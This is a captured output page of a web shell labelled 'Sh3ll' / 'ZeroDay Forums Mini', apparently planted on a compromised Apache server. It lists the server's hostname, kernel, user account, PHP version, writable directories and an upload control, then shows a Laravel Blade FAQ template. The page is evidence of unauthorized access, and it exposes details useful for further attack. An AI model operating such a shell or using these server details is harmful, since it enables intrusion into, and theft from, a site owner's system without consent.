Sh3ll
OdayForums


Server : Apache
System : Linux 145.162.205.92.host.secureserver.net 5.14.0-611.45.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 1 05:56:53 EDT 2026 x86_64
User : tradze ( 1001)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/tradze/www/storage-old/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/tradze/www/storage-old/framework/views/3d990b0046665f2398196f8c0830d994adf78d44.php
<?php foreach($results as $faq): ?>
<div class="treatment faq-wrap" id="<?php echo e(str_slug($faq->name)); ?>">
    <div class="row">
        <!-- start text-->
        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">

                <div class="treatment-title"><?php echo e($faq->name); ?><span class="icon_wrap"><i class="fa fa-plus"></i></span></div>
                <div class="text-zone-description"><?php echo $faq->body; ?></div>

        </div>
        <!-- end text-->
    </div>
</div>
<?php endforeach; ?>

ZeroDay Forums Mini